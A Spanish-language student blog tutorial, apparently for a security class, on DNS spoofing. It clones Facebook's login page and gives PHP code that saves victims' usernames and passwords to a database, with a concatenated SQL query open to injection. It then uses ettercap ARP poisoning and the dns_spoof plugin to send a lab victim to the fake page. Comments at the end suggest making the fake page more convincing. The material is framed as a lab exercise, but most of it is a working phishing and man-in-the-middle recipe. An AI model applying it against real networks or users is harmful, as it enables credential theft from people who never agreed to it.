Tutorial de la practica
1. En este tutorial se realizara un DNS SPOOFING paso a paso:
que es un DNS SPOOFING: es un método para alterar las direcciones de los servidores DNS que utiliza la potencial víctima y de esta forma poder tener control sobre las consultas que se realizan.
Primero vamos a descargar la pagina de Facebook, para ello entramos desde nuestro navegador a www.facebook.com, damos clic derecho sobre la pagina y elegimos la opción guardar, ahora entramos a NetBeans y creamos una BD que se llamara face en la cual crearemos la tabla registros2 con dos campos que se llamaran user y pass cada uno de tipo varchar con una longitud de 30.
que es un DNS SPOOFING: es un método para alterar las direcciones de los servidores DNS que utiliza la potencial víctima y de esta forma poder tener control sobre las consultas que se realizan.
Primero vamos a descargar la pagina de Facebook, para ello entramos desde nuestro navegador a www.facebook.com, damos clic derecho sobre la pagina y elegimos la opción guardar, ahora entramos a NetBeans y creamos una BD que se llamara face en la cual crearemos la tabla registros2 con dos campos que se llamaran user y pass cada uno de tipo varchar con una longitud de 30.
2.
El código que implementaremos en el index.php
será el siguiente:
<form method="POST" action="https://www.facebook.com/login.php?login_attempt=1"
onsubmit="return window.Event && Event.__inlineSubmit
&& Event.__inlineSubmit(this,event)">
<input
type="hidden" name="lsd" value="AVqX0AAv"
autocomplete="off">
<?php
if(isset($_POST["Registrar"]))
{
include("conexion.php");
$user=$_POST["user"];
$pass=$_POST["pass"];
{
$sql="INSERT INTO
registros2 (user,pass)values('$user','$pass');";
}
if(!mysql_query($sql))
echo "No se pudieron registrar los datos";
else
?>
<br>
<br>
<br>
<br>
<br>
<br>
<meta http-equiv="Refresh"
content="1;url=https://www.facebook.com/login.php?login_attempt=1">
<?php
}
else
{
?>
<form name="registros"
action="https://localhost/Facebook1/index.php"
method="POST">
En esta parte del codigo se manda llamar la
conexion, la cual manda llamar el codigo de la base de datos y despues de hacer
la suplantación te redirecciona a la pagina original de facebook.
3.
Ahora lo que vamos a hacer será guardar el proyecto
en la página de xammp para que al abrir la página de localhos en nuestro
navegador aparezca la página de Facebook falsa.
El proyecto quedara de la siguiente manera.
Y además de tener la carpeta en htdocs sacaremos la mayoría
de los archivos ahí dentro y los pegaremos en lacarpeta htdocs, los archivos
son los siguientes:
Esos archivos seleccionados los copiaremos y pegaremos en la
carpeta de htdocs para que queden de la siuiente manera:
El xampp trae una pagina de index la tendremos que borrar
para que quede solo la de Facebook falsa y asi poder verla en localhost:
Como se puede observar la dirección url es localhost.
Para continuar con el dns spoof se procede a realizar lo
siguiente:
4.
Abrir vmware y cargar kali Linux, seleccionamos
la opción Open a Virtual Machine.
C: \Users\gaby\Documents\utna\decimo\seguridad informatica\victimas\kali-linux.1.0..
7.
Sacar las direcciones ip y mac en mi caso:
00:0c:29:d8:82:d6
inet addr:192.168.31.139
Ip: 192.168.31.140
Mac: 00-0C-29-48-C2-5B
9.
Ahora sacamos la tabla arp de la víctima
ejecutando el comando arp –a:
192.168.31.2
00-50-56-f3-58-1d
10.
Accedemos desde la victima a www.facebook.com para verificar que aun accede a la
pagina original
12.
Ahora lo abrimos
·
*.facebook.com A 192.168.31.1
·
http//www.facebook.com.mx A 192.168.31.1
La
cual es la dirección IP del servidor.
15.
ahora activamos los servicios de http en la
ubicación: Applications à
Kali Linux à
System Services à
HTTP à
apache 2 start, después de dar clic podremos ver una ventana que muestra que el
servicio esta activado.
ettercap –T –q –M arp:remote –P dns_spoof //
Donde:
-T ejecuta ettercap en modo texto
-q no imprime todos los mensajes
-M método argumento ataque MITM (Man In The Middle).
-p Plugin a usar que seriadns_spoof
// Son las maquinas en el segmento.
17.
ahora
verificamos nuevamente la tabla arp de la victima para ver si coincide con la
mac del atacante, nuevamente con el comando arp –a y verificamos que es la
misma que el atacante:
00-0C-29-48-C2-5B
18.
ya que se realizo el envenenamiento se abre un
navegador en la victima y se teclea la dirección www.facebook.com y asi veremos que la pagina
a la que accede es falsa
Como podemos observar no es la pagina
original de Facebook, ahora ingresamos los datos para obtenerlos desde
phpmyadmin en localhost
19.
ahora aceedemos desde nuestra computadora a
localhost/xampp y en la
Y en esta parte podremos verificar que se
registró exitosamente:
Y pues prácticamente eso sería todo el proceso
a seguir.
te faltó mejorar la página falsa, cualquiera se habría dado cuenta de que no era la "buena" de face.
ResponderEliminarSi le purdieras agragar una imagen de el redireccionamiento que sucede después de que te "robas" la contraseña junto con el código que usas, podrías mejorar la calificación de la tarea.
no tengo calificación para tu práctica :(